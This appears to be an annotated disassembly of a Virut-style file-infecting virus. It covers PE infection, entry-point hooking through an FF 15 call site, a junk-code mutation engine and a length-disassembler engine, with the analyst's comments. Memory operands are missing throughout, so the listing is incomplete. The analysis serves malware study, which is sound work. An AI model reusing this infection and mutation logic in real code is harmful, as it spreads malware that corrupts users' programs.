7FF82019 0BDB or ebx,ebx
7FF8201B 75 12 jnz short 7FF8202F
7FF8201D 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF82024 75 09 jnz short 7FF8202F
7FF82026 6A 03 push 0x3
7FF82028 68 00000080 push 0x80000000
7FF8202D EB 07 jmp short 7FF82036
7FF8202F 6A 01 push 0x1
7FF82031 68 000000C0 push 0xC0000000
7FF82036 56 push esi
7FF82037 FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF8203D 83F8 FF cmp eax,-0x1
7FF82040 0F84 A2130000 je 7FF833E8
7FF82046 8985 6A541B00 mov dword ptr ss:,eax
7FF8204C 85DB test ebx,ebx
7FF8204E 74 21 je short 7FF82071
7FF82050 8D8D 6E541B00 lea ecx,dword ptr ss:
7FF82056 8D95 76541B00 lea edx,dword ptr ss:
7FF8205C 51 push ecx
7FF8205D 52 push edx
7FF8205E 6A 00 push 0x0
7FF82060 50 push eax
7FF82061 FF95 68501B00 call dword ptr ss:
7FF82067 85C0 test eax,eax
7FF82069 74 06 je short 7FF82071
7FF8206B FE85 07551B00 inc byte ptr ss:
7FF82071 6A 00 push 0x0
7FF82073 FFB5 6A541B00 push dword ptr ss:
7FF82079 FF95 64501B00 call dword ptr ss: ; GetFileSize
7FF8207F 83F8 FF cmp eax,-0x1
7FF82082 0F84 1C130000 je 7FF833A4
7FF82088 8985 7E541B00 mov dword ptr ss:,eax
7FF8208E 33C9 xor ecx,ecx
7FF82090 03C3 add eax,ebx
7FF82092 51 push ecx
7FF82093 50 push eax
7FF82094 51 push ecx
7FF82095 0BDB or ebx,ebx
7FF82097 75 09 jnz short 7FF820A2
7FF82099 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820A0 74 04 je short 7FF820A6
7FF820A2 6A 04 push 0x4
7FF820A4 EB 02 jmp short 7FF820A8
7FF820A6 6A 02 push 0x2
7FF820A8 51 push ecx
7FF820A9 FFB5 6A541B00 push dword ptr ss:
7FF820AF FF95 44501B00 call dword ptr ss: ; CreateFileMappingA
7FF820B5 85C0 test eax,eax
7FF820B7 0F84 E7120000 je 7FF833A4
7FF820BD 33C9 xor ecx,ecx
7FF820BF 8985 82541B00 mov dword ptr ss:,eax
7FF820C5 51 push ecx
7FF820C6 51 push ecx
7FF820C7 51 push ecx
7FF820C8 85DB test ebx,ebx
7FF820CA 0BDB or ebx,ebx
7FF820CC 75 09 jnz short 7FF820D7
7FF820CE 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820D5 74 07 je short 7FF820DE
7FF820D7 68 1F000F00 push 0xF001F
7FF820DC EB 05 jmp short 7FF820E3
7FF820DE 68 1D000F00 push 0xF001D
7FF820E3 50 push eax
7FF820E4 FF95 98501B00 call dword ptr ss: ; MapViewOfFile
7FF820EA 85C0 test eax,eax
7FF820EC 0F84 81120000 je 7FF83373
Create the file mapping. The same routine serves both passes: with ebx == 0 (and the flag at [ebp+1B501C] clear) the file is opened GENERIC_READ (0x80000000) with share mode 3 and mapped PAGE_READONLY (2) with access 0xF001D (FILE_MAP_ALL_ACCESS minus FILE_MAP_WRITE); otherwise it is opened GENERIC_READ|GENERIC_WRITE (0xC0000000) with share mode 1 and mapped PAGE_READWRITE (4) with FILE_MAP_ALL_ACCESS (0xF001F), and the mapping is sized to the file size plus ebx (add eax,ebx at 7FF82090), so ebx is the number of bytes the file is about to grow by. The unlabelled call at 7FF82061 has the same argument layout as the SetFileTime call at the end of the routine: it is GetFileTime, saving the timestamps so they can be restored after infection.
7FF8281C 8BB5 86541B00 mov esi,dword ptr ss:
7FF82822 66:813E 4D5A cmp word ptr ds:,0x5A4D ; check the DOS header ("MZ")
7FF82827 0F85 240B0000 jnz 7FF83351
7FF8282D 8B5E 3C mov ebx,dword ptr ds:
7FF82830 81FB FFFF0000 cmp ebx,0xFFFF
7FF82836 0F87 150B0000 ja 7FF83351
7FF8283C 03DE add ebx,esi
7FF8283E 66:813B 5045 cmp word ptr ds:,0x4550 ; check the PE signature ("PE")
7FF82843 0F85 080B0000 jnz 7FF83351
7FF82849 F743 16 0020000>test dword ptr ds:,0x2000 ; Characteristics
7FF82850 0F85 FB0A0000 jnz 7FF83351
7FF82856 F643 5C 02 test byte ptr ds:,0x2 ; SubSystem
7FF8285A 0F84 F10A0000 je 7FF83351
7FF82860 8B85 81421B00 mov eax,dword ptr ss:
7FF82131 0FB74B 06 movzx ecx,word ptr ds: ; NumberOfSections
7FF82135 F9 stc
7FF82136 E3 36 jecxz short 7FF8216E
7FF82138 8D53 18 lea edx,dword ptr ds:
7FF8213B 0FB743 14 movzx eax,word ptr ds:
7FF8213F 03D0 add edx,eax ; locate the section table (0x18 + SizeOfOptionalHeader)
7FF82141 49 dec ecx
7FF82142 6BC1 28 imul eax,ecx,0x28 ; size of one section header
7FF82145 03D0 add edx,eax
7FF82147 813A 5F77696E cmp dword ptr ds:,0x6E69775F ; edx now points at the last section header
7FF8214D F9 stc ; "_win"
7FF8214E 74 1E je short 7FF8216E ; is the name "_win"? then the file is already infected: bail out with CF set
7FF82150 49 dec ecx
7FF82151 837A 0C 01 cmp dword ptr ds:,0x1
7FF82155^ 72 DF jb short 7FF82136
7FF82157 8B4B 3C mov ecx,dword ptr ds: ; FileAlignment
7FF8215A 8B42 14 mov eax,dword ptr ds: ; PointerToRawData
7FF8215D 0342 10 add eax,dword ptr ds: ; + SizeOfRawData
7FF82160 8D4448 FF lea eax,dword ptr ds:
7FF82164 F7D9 neg ecx
7FF82166 23C1 and eax,ecx ; round up to FileAlignment
7FF82874 /0F82 D70A0000 jb 7FF83351
7FF8287A |8B42 08 mov eax,dword ptr ds: ; VirtualSize (offset 8 of the section header)
7FF8287D |2B42 10 sub eax,dword ptr ds: ; - SizeOfRawData; clamped to 0 below
7FF82880 |73 02 jnb short 7FF82884
7FF82882 |33C0 xor eax,eax
7FF82884 |8985 8E541B00 mov dword ptr ss:,eax
7FF8288A |C785 1C1B1B00 E>mov dword ptr ss:,0x43EC
7FF820F9 8B85 1C1B1B00 mov eax,dword ptr ss:
7FF820FF 8B4B 38 mov ecx,dword ptr ds: ; SectionAlignment
7FF82102 05 E4060000 add eax,0x6E4
7FF82107 33D2 xor edx,edx
7FF82109 8D4401 FF lea eax,dword ptr ds:
7FF8210D F7F1 div ecx
7FF8210F F7E1 mul ecx ; round up to a whole number of SectionAlignment units
7FF82111 8985 92541B00 mov dword ptr ss:,eax ; store the final (virtual) size
7FF82117 8B4B 3C mov ecx,dword ptr ds:
7FF8211A 8B85 1C1B1B00 mov eax,dword ptr ss:
7FF82120 33D2 xor edx,edx
7FF82122 8D4401 FF lea eax,dword ptr ds:
7FF82126 F7F1 div ecx
7FF82128 F7E1 mul ecx
7FF8212A 8985 8A541B00 mov dword ptr ss:,eax ; store the final (file-aligned) size
7FF82130 C3 retn
7FF8335A 83BD 6A541B00 0>cmp dword ptr ss:,0x0
7FF83361 0F84 9D000000 je 7FF83404
7FF83367 FFB5 86541B00 push dword ptr ss:
7FF8336D FF95 C4501B00 call dword ptr ss: ; UnmapViewOfFile
7FF83373 FFB5 82541B00 push dword ptr ss:
7FF83379 FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF8337F 80BD 07551B00 0>cmp byte ptr ss:,0x0
7FF83386 74 1C je short 7FF833A4
7FF83388 8D8D 6E541B00 lea ecx,dword ptr ss:
Here it collects the parameters it needs (FileAlignment, SectionAlignment, the last section header), computes the new sizes the file will need, and closes the handles.
7FF81FE9 85DB test ebx,ebx
7FF81FEB 74 25 je short 7FF82012
7FF81FED 56 push esi
7FF81FEE FF95 60501B00 call dword ptr ss: ; GetFileAttributesA
7FF81FF4 83F8 FF cmp eax,-0x1
7FF81FF7 74 19 je short 7FF82012
7FF81FF9 8985 66541B00 mov dword ptr ss:,eax
7FF81FFF 6A 00 push 0x0
7FF82001 56 push esi
7FF82002 FF95 B0501B00 call dword ptr ss: ; SetFileAttributesA
7FF82008 85C0 test eax,eax
7FF8200A 74 06 je short 7FF82012
7FF8200C FE85 06551B00 inc byte ptr ss:
7FF82012 2BC0 sub eax,eax
7FF82014 50 push eax
7FF82015 50 push eax
7FF82016 6A 03 push 0x3
7FF82018 50 push eax
7FF82019 0BDB or ebx,ebx
Query and set the file attributes (the original attributes are saved here and restored by the SetFileAttributesA call at the end).
7FF8201B /75 12 jnz short 7FF8202F
7FF8201D |83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF82024 |75 09 jnz short 7FF8202F
7FF82026 |6A 03 push 0x3
7FF82028 |68 00000080 push 0x80000000
7FF8202D |EB 07 jmp short 7FF82036
7FF8202F \6A 01 push 0x1
7FF82031 68 000000C0 push 0xC0000000
7FF82036 56 push esi
7FF82037 FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF8203D 83F8 FF cmp eax,-0x1
7FF82040 0F84 A2130000 je 7FF833E8
7FF82046 8985 6A541B00 mov dword ptr ss:,eax
7FF8204C 85DB test ebx,ebx
7FF8204E 74 21 je short 7FF82071
7FF82050 8D8D 6E541B00 lea ecx,dword ptr ss:
7FF82056 8D95 76541B00 lea edx,dword ptr ss:
7FF8205C 51 push ecx
7FF8205D 52 push edx
7FF8205E 6A 00 push 0x0
7FF82060 50 push eax
7FF82061 FF95 68501B00 call dword ptr ss:
7FF82067 85C0 test eax,eax
7FF82069 74 06 je short 7FF82071
7FF8206B FE85 07551B00 inc byte ptr ss:
7FF82071 6A 00 push 0x0
7FF82073 FFB5 6A541B00 push dword ptr ss:
7FF82079 FF95 64501B00 call dword ptr ss: ; GetFileSize(handle, NULL)
7FF8207F 83F8 FF cmp eax,-0x1
7FF82082 0F84 1C130000 je 7FF833A4
7FF82088 8985 7E541B00 mov dword ptr ss:,eax
7FF8208E 33C9 xor ecx,ecx
7FF82090 03C3 add eax,ebx
7FF82092 51 push ecx
7FF82093 50 push eax
7FF82094 51 push ecx
7FF82095 0BDB or ebx,ebx
7FF82097 75 09 jnz short 7FF820A2
7FF82099 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820A0 74 04 je short 7FF820A6
7FF820A2 6A 04 push 0x4
7FF820A4 EB 02 jmp short 7FF820A8
7FF820A6 6A 02 push 0x2
7FF820A8 51 push ecx
7FF820A9 FFB5 6A541B00 push dword ptr ss:
7FF820AF FF95 44501B00 call dword ptr ss: ; CreateFileMappingA
7FF820B5 85C0 test eax,eax
7FF820B7 0F84 E7120000 je 7FF833A4
7FF820BD 33C9 xor ecx,ecx
7FF820BF 8985 82541B00 mov dword ptr ss:,eax
7FF820C5 51 push ecx
7FF820C6 51 push ecx
7FF820C7 51 push ecx
7FF820C8 85DB test ebx,ebx
7FF820CA 0BDB or ebx,ebx
7FF820CC 75 09 jnz short 7FF820D7
Next it builds the mapping again: the same open/map routine, now reached with ebx nonzero, so the file is opened read/write and the mapping is enlarged by ebx bytes.
Next comes the part that scans the instructions and marks them.
7FF828E2 66:8367 02 00 and word ptr ds:,0x0
7FF828E7 6A 03 push 0x3 ; instructions per record
7FF828E9 58 pop eax
7FF828EA 66:8327 00 and word ptr ds:,0x0 ; initialise
7FF828EE 66:C747 06 0080 mov word ptr ds:,0x8000 ; initialise
7FF828F4 E8 2FE9FFFF call 7FF81228
7FF828F9 8D4A 03 lea ecx,dword ptr ds:
7FF828FC 51 push ecx
7FF828FD 8D85 0A101B00 lea eax,dword ptr ss:
7FF82903 8D8D 4A101B00 lea ecx,dword ptr ss:
7FF82909 8D95 E0111B00 lea edx,dword ptr ss:
7FF8290F 3BF0 cmp esi,eax ; is this one of the special regions?
7FF82911 75 08 jnz short 7FF8291B
7FF82913 68 05000000 push 0x5
7FF82918 59 pop ecx
7FF82919 EB 37 jmp short 7FF82952
7FF8291B 3BF1 cmp esi,ecx ; special region
7FF8291D 75 05 jnz short 7FF82924
7FF8291F 6A 02 push 0x2
7FF82921 59 pop ecx
7FF82922 EB 2E jmp short 7FF82952
7FF82924 3BF2 cmp esi,edx
7FF82926 75 09 jnz short 7FF82931
7FF82928 6A 05 push 0x5
7FF8292A C647 07 00 mov byte ptr ds:,0x0
7FF8292E 59 pop ecx
7FF8292F EB 21 jmp short 7FF82952
7FF82931 8A06 mov al,byte ptr ds: ; fetch the opcode
7FF82933 3C E9 cmp al,0xE9 ; jmp rel32
7FF82935 74 0C je short 7FF82943
7FF82937 3C EB cmp al,0xEB ; jmp rel8
7FF82939 74 08 je short 7FF82943
7FF8293B 3C C2 cmp al,0xC2 ; retn X
7FF8293D 74 04 je short 7FF82943
7FF8293F 3C C3 cmp al,0xC3 ; retn
7FF82941 75 06 jnz short 7FF82949
7FF82943 C647 07 80 mov byte ptr ds:,0x80 ; flag it
7FF82947 EB 04 jmp short 7FF8294D
7FF82949 C647 07 00 mov byte ptr ds:,0x0
7FF8294D E8 C2120000 call 7FF83C14 ; length-disassembler engine
7FF82952 66:010F add word ptr ds:,cx ; total byte count of this record
7FF82955 8D85 E8111B00 lea eax,dword ptr ss: ; end of the region
7FF8295B 03F1 add esi,ecx
7FF8295D 3BF0 cmp esi,eax
7FF8295F 59 pop ecx
7FF82960 73 2F jnb short 7FF82991
7FF82962^ E2 98 loopd short 7FF828FC
7FF82964 FE85 23171B00 inc byte ptr ss: ; number of records so far
7FF8296A 80BD 23171B00 6>cmp byte ptr ss:,0x63
7FF82971 77 13 ja short 7FF82986
7FF82973 66:8B47 02 mov ax,word ptr ds: ; running total
7FF82977 66:0307 add ax,word ptr ds: ; plus this record's count
7FF8297A 83C7 08 add edi,0x8
7FF8297D 66:8947 02 mov word ptr ds:,ax
7FF82981^ E9 61FFFFFF jmp 7FF828E7
7FF82986 FE85 E8381B00 inc byte ptr ss:
7FF8298C^ E9 37FFFFFF jmp 7FF828C8
Instructions are recorded three at a time; jmp and retn are recognised and flagged.
They are stored in a structure like this (field order taken from the offsets the listing uses: [edi] receives this record's byte count, [edi+2] the running total carried over from the previous record, [edi+6] is initialised to 0x8000 and its high byte [edi+7] is set to 0x80 for a jmp/retn):
virutcode struct
thiscodesize dw ? ; +0
sumopcodesize dw ? ; +2
unknown dw ? ; +4
jmpretflag dw ? ; +6
virutcode ends
7FF82AA1 FF95 30501B00 call dword ptr ss: ; compare the imported DLL name against kernel32.dll
7FF82AA7 85C0 test eax,eax
7FF82AA9 5A pop edx
7FF82AAA 74 05 je short 7FF82AB1
7FF82B04 03B5 86541B00 add esi,dword ptr ss: ; esi = original OEP inside the mapped view
7FF82B0A FFB5 E6541B00 push dword ptr ss:
7FF82B10 AC lods byte ptr ds:
7FF82B11 3C E8 cmp al,0xE8 ; is it E8 (call rel32)?
7FF82B13 75 3F jnz short 7FF82B54
7FF82B4F 8B40 02 mov eax,dword ptr ds:
7FF82B52 EB 28 jmp short 7FF82B7C
7FF82B54 3C FF cmp al,0xFF ; look for FF
7FF82B56 75 0A jnz short 7FF82B62
7FF82B58 803E 15 cmp byte ptr ds:,0x15 ; followed by 15: FF 15 = call dword ptr [imm32]
7FF82B5B 75 05 jnz short 7FF82B62
Here it is looking for FF 15, FF 25 and the like (a call or jmp through an import slot) to use as the hook site.
In this instance the hook site is an FF 15.
7FF82BAD^\73 B3 jnb short 7FF82B62
7FF82BAF 8F85 E6541B00 pop dword ptr ss:
7FF82BB5 FE85 10551B00 inc byte ptr ss:
7FF82BBB 814A 24 600000E>or dword ptr ds:,0xE0000060 ; set section Characteristics: MEM_EXECUTE|MEM_READ|MEM_WRITE|CNT_CODE|CNT_INITIALIZED_DATA
Next comes the mutation engine.
7FF82C47 50 push eax
7FF82C48 B0 02 mov al,0x2
7FF82C4A E8 D9E5FFFF call 7FF81228 ; generate a random number
7FF82C4F 0AD2 or dl,dl
7FF82C51 0F85 4C010000 jnz 7FF82DA3
7FF82C57 8BC6 mov eax,esi
7FF82C59 2BC5 sub eax,ebp ; compute the offset
7FF82C5B 3D 0A101B00 cmp eax,0x1B100A ; compare the offset
7FF82C60 75 0B jnz short 7FF82C6D
7FF82C62 68 05000000 push 0x5
7FF82C67 59 pop ecx
7FF82C68 E9 25010000 jmp 7FF82D92
7FF82C6D 3D 4A101B00 cmp eax,0x1B104A ; compare the offset
7FF82C72 75 08 jnz short 7FF82C7C
7FF82C74 6A 02 push 0x2
7FF82C76 59 pop ecx
7FF82C77 E9 16010000 jmp 7FF82D92
7FF82C7C 3D E0111B00 cmp eax,0x1B11E0 ; compare the offset; these appear to be special regions
7FF82C81 75 08 jnz short 7FF82C8B
7FF82C83 6A 05 push 0x5
7FF82C85 59 pop ecx
7FF82C86 E9 07010000 jmp 7FF82D92
7FF82C8B 80BD 10551B00 F>cmp byte ptr ss:,0xFF
7FF82C92 74 6C je short 7FF82D00 ; compare the offset; these appear to be special regions
7FF82C94 3D DB101B00 cmp eax,0x1B10DB
7FF82C99 72 65 jb short 7FF82D00 ; compare the offset; these appear to be special regions
7FF82C9B 3D E3101B00 cmp eax,0x1B10E3
7FF82CA0 73 5E jnb short 7FF82D00 ; compare the offset; these appear to be special regions
7FF82CA2 807E 01 5C cmp byte ptr ds:,0x5C
7FF82CA6 75 58 jnz short 7FF82D00
7FF82CA8 AD lods dword ptr ds:
7FF82CA9 8BD7 mov edx,edi
7FF82CAB 8985 281B1B00 mov dword ptr ss:,eax
7FF82CB1 AA stos byte ptr es:
7FF82CB2 B0 1D mov al,0x1D
7FF82CB4 2B95 CE541B00 sub edx,dword ptr ss:
7FF82CBA AA stos byte ptr es:
7FF82CBB 6A 04 push 0x4
7FF82CBD 8B85 02551B00 mov eax,dword ptr ss:
7FF82CC3 3B95 201B1B00 cmp edx,dword ptr ss:
7FF82CC9 76 06 jbe short 7FF82CD1
7FF82CCB 81EA 343D0000 sub edx,0x3D34
7FF82CD1 59 pop ecx
7FF82CD2 AB stos dword ptr es:
7FF82CD3 8995 241B1B00 mov dword ptr ss:,edx
7FF82CD9 0FB395 441A1B00 btr dword ptr ss:,edx
7FF82CE0 42 inc edx
7FF82CE1^ E2 F6 loopd short 7FF82CD9
7FF82CE3 8B0424 mov eax,dword ptr ss:
7FF82CE6 66:8384C5 2A171>add word ptr ss:,0x4
7FF82CEF 836C24 04 04 sub dword ptr ss:,0x4
7FF82CF4 B1 02 mov cl,0x2
7FF82CF6 E9 BA000000 jmp 7FF82DB5
7FF82CFB E9 92000000 jmp 7FF82D92
7FF82D00 3D 73111B00 cmp eax,0x1B1173
7FF82D05 0F85 82000000 jnz 7FF82D8D
7FF82D0B 80BD 10551B00 0>cmp byte ptr ss:,0x0
7FF82D12 72 79 jb short 7FF82D8D
7FF82D14 80BD 10551B00 0>cmp byte ptr ss:,0x2
7FF82D1B 73 70 jnb short 7FF82D8D
7FF82D1D 80BD 10551B00 0>cmp byte ptr ss:,0x0
7FF82D24 75 06 jnz short 7FF82D2C
7FF82D26 89BD 12551B00 mov dword ptr ss:,edi
7FF82D2C 0FB685 11551B00 movzx eax,byte ptr ss:
7FF82D33 6A 07 push 0x7
7FF82D35 6BC0 03 imul eax,eax,0x3
7FF82D38 59 pop ecx
7FF82D39 8B95 FE541B00 mov edx,dword ptr ss:
7FF82D3F 80BD 10551B00 0>cmp byte ptr ss:,0x1
7FF82D46 75 05 jnz short 7FF82D4D
7FF82D48 83C2 04 add edx,0x4
7FF82D4B 2BD0 sub edx,eax
7FF82D4D 03C8 add ecx,eax
7FF82D4F B0 C6 mov al,0xC6
7FF82D51 0285 11551B00 add al,byte ptr ss:
7FF82D57 AA stos byte ptr es:
7FF82D58 B0 05 mov al,0x5
7FF82D5A AA stos byte ptr es:
7FF82D5B 8BC2 mov eax,edx
7FF82D5D 0343 34 add eax,dword ptr ds:
7FF82D60 AB stos dword ptr es:
7FF82D61 0395 E6541B00 add edx,dword ptr ss:
7FF82D67 0395 86541B00 add edx,dword ptr ss:
7FF82D6D 8B02 mov eax,dword ptr ds:
7FF82D6F 80BD 11551B00 0>cmp byte ptr ss:,0x0
7FF82D76 75 03 jnz short 7FF82D7B
7FF82D78 AA stos byte ptr es:
7FF82D79 EB 01 jmp short 7FF82D7C
7FF82D7B AB stos dword ptr es:
7FF82D7C FE85 10551B00 inc byte ptr ss:
7FF82D82 80B5 11551B00 0>xor byte ptr ss:,0x1
7FF82D89 EB 2A jmp short 7FF82DB5
7FF82D8B EB 05 jmp short 7FF82D92
7FF82D8D E8 820E0000 call 7FF83C14 ; length-disassembler engine
7FF82D92 C685 E13D1B00 B>mov byte ptr ss:,0xB3
7FF82D99 51 push ecx
7FF82D9A 294C24 08 sub dword ptr ss:,ecx
7FF82D9E F3:A4 rep movs byte ptr es:,byte ptr ds:[>; copy the code
7FF82DA0 59 pop ecx
7FF82DA1 EB 19 jmp short 7FF82DBC
7FF82DA3 57 push edi
7FF82DA4 F71C24 neg dword ptr ss:
7FF82DA7 E8 4AF4FFFF call 7FF821F6 ; an ETG-style engine that generates random junk instructions
7FF82DAC 59 pop ecx ; and places them in the infected file
7FF82DAD 03CF add ecx,edi
7FF82DAF 298D D2541B00 sub dword ptr ss:,ecx
7FF82DB5 C685 E13D1B00 A>mov byte ptr ss:,0xAB
7FF82DBC 8B0424 mov eax,dword ptr ss:
7FF82DBF 66:018CC5 2A171>add word ptr ss:,cx
7FF82DC7 8D57 FF lea edx,dword ptr ds:
7FF82DCA E3 1E jecxz short 7FF82DEA
7FF82DCC 2B95 CE541B00 sub edx,dword ptr ss:
7FF82DD2 3B95 201B1B00 cmp edx,dword ptr ss:
7FF82DD8 76 06 jbe short 7FF82DE0
7FF82DDA 81EA 343D0000 sub edx,0x3D34
7FF82DE0 0FB395 441A1B00 btr dword ptr ss:,edx
7FF82DE7 4A dec edx
7FF82DE8^ E2 F6 loopd short 7FF82DE0
A random 0/1 decides whether junk instructions are inserted; then the code is moved.
A block of code follows that presumably fixes up relocations and processes the code. With my limited ability it was hard going to read,
and it would have cost me a great deal of time, so it is not analysed here.
7FF832FD 03BD E6541B00 add edi,dword ptr ss:
7FF83303 B0 E9 mov al,0xE9
7FF83305 AA stos byte ptr es: ; written at the FF 15 found earlier
7FF83306 8D42 FB lea eax,dword ptr ds:
7FF83309 2B85 FE541B00 sub eax,dword ptr ss:
7FF8330F AB stos dword ptr es: ; E9 rel32: jump to the start of the virus code
7FF83310 83BD 1A551B00 0>cmp dword ptr ss:,0x0
7FF83361 /0F84 9D000000 je 7FF83404
7FF83367 |FFB5 86541B00 push dword ptr ss:
7FF8336D |FF95 C4501B00 call dword ptr ss: ; UnmapViewOfFile
7FF83373 |FFB5 82541B00 push dword ptr ss:
7FF83379 |FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF8337F |80BD 07551B00 0>cmp byte ptr ss:,0x0
7FF83386 |74 1C je short 7FF833A4
7FF83388 |8D8D 6E541B00 lea ecx,dword ptr ss:
7FF8338E |8D95 76541B00 lea edx,dword ptr ss:
7FF83394 |51 push ecx
7FF83395 |52 push edx
7FF83396 |6A 00 push 0x0
7FF83398 |FFB5 6A541B00 push dword ptr ss:
7FF8339E |FF95 B8501B00 call dword ptr ss: ; SetFileTime
7FF833A4 |80BD FC551B00 0>cmp byte ptr ss:,0x0
7FF833AB |74 2F je short 7FF833DC
7FF833AD |8B85 7E541B00 mov eax,dword ptr ss:
7FF833B3 |6A 00 push 0x0
7FF833B5 |0385 8A541B00 add eax,dword ptr ss:
7FF833BB |0385 8E541B00 add eax,dword ptr ss:
7FF833C1 |6A 00 push 0x0
7FF833C3 |50 push eax
7FF833C4 |FFB5 6A541B00 push dword ptr ss:
7FF833CA |FF95 B4501B00 call dword ptr ss: ; SetFilePointer(handle, new size, NULL, FILE_BEGIN)
7FF833D0 |FFB5 6A541B00 push dword ptr ss:
7FF833D6 |FF95 AC501B00 call dword ptr ss: ; SetEndOfFile
7FF833DC |FFB5 6A541B00 push dword ptr ss:
7FF833E2 |FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF833E8 |80BD 06551B00 0>cmp byte ptr ss:,0x0
7FF833EF |74 13 je short 7FF83404
7FF833F1 |8DB5 62531B00 lea esi,dword ptr ss:
7FF833F7 |FFB5 66541B00 push dword ptr ss:
7FF833FD |56 push esi
7FF833FE |FF95 B0501B00 call dword ptr ss: ; SetFileAttributesA
7FF83404 \66:83A5 06551B0>and word ptr ss:,0x0
7FF8340C 83A5 6A541B00 0>and dword ptr ss:,0x0
7FF83413 C3 retn
Final cleanup; infection done: unmap the view, restore the saved timestamps with SetFileTime, extend the file to the new length with SetFilePointer/SetEndOfFile, close the handle and put the original attributes back.
7C92D095 BA 0003FE7F mov edx,0x7FFE0300
7C92D09A FF12 call dword ptr ds:
This is ntdll's system-call stub (0x7FFE0300 is the SystemCall pointer in KUSER_SHARED_DATA); from here execution returns to the code just below the hook.
The infection procedure is complete.
What it looks like after infection:
Before infection:
4AD74A29 C605 5550D04A F>mov byte ptr ds:,0xFF
4AD74A30 C705 5650D04A 1>mov dword ptr ds:,0xD0101C15
4AD74A3A 90 nop
Finally the exe restores the stolen code (the two stores put back the bytes FF 15 1C 10 D0 that the E9 jump overwrote) and returns.
End.
Appended here is a brief analysis of the virus's length-disassembler engine.
7FF83C14 56 push esi
7FF83C15 33C9 xor ecx,ecx
7FF83C17 C685 08551B00 0>mov byte ptr ss:,0x1 ;operand size defaults to 32-bit
7FF83C1E C685 09551B00 0>mov byte ptr ss:,0x1 ;address size defaults to 32-bit
7FF83C25 33C0 xor eax,eax
7FF83C27 AC lods byte ptr ds:
7FF83C28 8B8485 14441B00 mov eax,dword ptr ss: ;table lookup; each entry is a dword of instruction attributes
7FF83C2F A9 10000000 test eax,0x10 ;two-byte opcode (0F escape)
7FF83C34 74 0B je short 7FF83C41
7FF83C36 41 inc ecx ;count the escape byte
7FF83C37 33C0 xor eax,eax
7FF83C39 AC lods byte ptr ds: ;fetch the second opcode byte
7FF83C3A 8B8485 14481B00 mov eax,dword ptr ss: ;look it up in the second table
7FF83C41 A9 00001000 test eax,0x100000
7FF83C46 74 06 je short 7FF83C4E
7FF83C48 41 inc ecx
7FF83C49 0D 00010000 or eax,0x100
7FF83C4E A9 04000000 test eax,0x4
7FF83C53 74 07 je short 7FF83C5C
7FF83C55 80B5 08551B00 0>xor byte ptr ss:,0x1 ;toggle the 16/32-bit operand-size flag (prefix 66h)
7FF83C5C A9 08000000 test eax,0x8
7FF83C61 74 07 je short 7FF83C6A
7FF83C63 80B5 09551B00 0>xor byte ptr ss:,0x1 ; toggle the 16/32-bit address-size flag (prefix 67h)
7FF83C6A A9 02000000 test eax,0x2 ;ordinary prefix
7FF83C6F 74 03 je short 7FF83C74
7FF83C71 41 inc ecx ;count the prefix byte
7FF83C72^ EB B1 jmp short 7FF83C25 ;and fetch the next opcode byte
7FF83C74 A9 21000000 test eax,0x21
7FF83C79 74 01 je short 7FF83C7C
7FF83C7B 41 inc ecx
7FF83C7C A9 20000000 test eax,0x20
7FF83C81 74 01 je short 7FF83C84
7FF83C83 41 inc ecx
7FF83C84 A9 00600000 test eax,0x6000
7FF83C89 74 11 je short 7FF83C9C
7FF83C8B 80BD 08551B00 0>cmp byte ptr ss:,0x0
7FF83C92 75 05 jnz short 7FF83C99
7FF83C94 83C1 04 add ecx,0x4
7FF83C97 EB 03 jmp short 7FF83C9C
7FF83C99 83C1 06 add ecx,0x6
7FF83C9C A9 80000000 test eax,0x80
7FF83CA1 74 0F je short 7FF83CB2
7FF83CA3 80BD 09551B00 0>cmp byte ptr ss:,0x1
7FF83CAA 75 03 jnz short 7FF83CAF
7FF83CAC 83C1 02 add ecx,0x2
7FF83CAF 83C1 02 add ecx,0x2
7FF83CB2 A9 40000000 test eax,0x40 ;operand-size-dependent field (imm16/32 or rel16/32)
7FF83CB7 74 0F je short 7FF83CC8
7FF83CB9 80BD 08551B00 0>cmp byte ptr ss:,0x1 ;32-bit operand size?
7FF83CC0 75 03 jnz short 7FF83CC5
7FF83CC2 83C1 02 add ecx,0x2
7FF83CC5 83C1 02 add ecx,0x2 ;adjust the length
7FF83CC8 A9 00000800 test eax,0x80000
7FF83CCD 74 19 je short 7FF83CE8
7FF83CCF 50 push eax
7FF83CD0 AC lods byte ptr ds:
7FF83CD1 3C F8 cmp al,0xF8
7FF83CD3 74 08 je short 7FF83CDD
7FF83CD5 3C E8 cmp al,0xE8
7FF83CD7 74 04 je short 7FF83CDD
7FF83CD9 3C 70 cmp al,0x70
7FF83CDB 75 03 jnz short 7FF83CE0
7FF83CDD 41 inc ecx
7FF83CDE EB 07 jmp short 7FF83CE7
7FF83CE0 810C24 00010000 or dword ptr ss:,0x100
7FF83CE7 58 pop eax
7FF83CE8 A9 00800000 test eax,0x8000
7FF83CED 74 1B je short 7FF83D0A
7FF83CEF 8A16 mov dl,byte ptr ds:
7FF83CF1 80E2 38 and dl,0x38
7FF83CF4 75 0A jnz short 7FF83D00
7FF83CF6 B8 01010000 mov eax,0x101
7FF83CFB^ E9 2FFFFFFF jmp 7FF83C2F
7FF83D00 B8 00010000 mov eax,0x100
7FF83D05^ E9 25FFFFFF jmp 7FF83C2F
7FF83D0A A9 00000100 test eax,0x10000
7FF83D0F 74 1B je short 7FF83D2C
7FF83D11 8A16 mov dl,byte ptr ds:
7FF83D13 80E2 38 and dl,0x38
7FF83D16 75 0A jnz short 7FF83D22
7FF83D18 B8 40010000 mov eax,0x140
7FF83D1D^ E9 0DFFFFFF jmp 7FF83C2F
7FF83D22 B8 00010000 mov eax,0x100
7FF83D27^ E9 03FFFFFF jmp 7FF83C2F
7FF83D2C A9 00000200 test eax,0x20000
7FF83D31 74 0A je short 7FF83D3D
7FF83D33 B8 00010000 mov eax,0x100
7FF83D38^ E9 F2FEFFFF jmp 7FF83C2F
7FF83D3D A9 00010000 test eax,0x100 ;does the instruction have a ModRM byte?
7FF83D42 74 6E je short 7FF83DB2
7FF83D44 AC lods byte ptr ds:
